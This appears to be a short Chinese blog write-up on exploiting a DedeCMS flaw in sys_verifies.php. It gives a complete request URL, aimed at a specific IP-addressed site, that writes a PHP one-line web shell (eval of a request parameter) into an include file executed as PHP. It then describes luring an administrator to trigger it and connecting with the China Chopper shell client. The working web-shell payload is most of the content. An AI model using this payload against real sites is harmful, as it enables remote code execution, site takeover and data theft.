这是一个dedecms的漏洞,我们可以去网上审计一下这种漏洞后发现 sys_verifies.php? 这个参数他会写入inc文件下面,那么就是我们可以控制的参数了
首先我们访问网站后台http://120.203.13.75:8123/csrf/uploads/dede/
然后构造我们的一句话木马 getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_REQUEST[a]);echo 'ok';
这句话会写入文件,内容是一句话木马,而且Inc文件会当做PHP执行,这样我们就可以进行攻击,只要管理员访问了以后 我们就可以菜刀链接了。
写入一句话木马
http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_REQUEST[a]);echo 'ok';
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.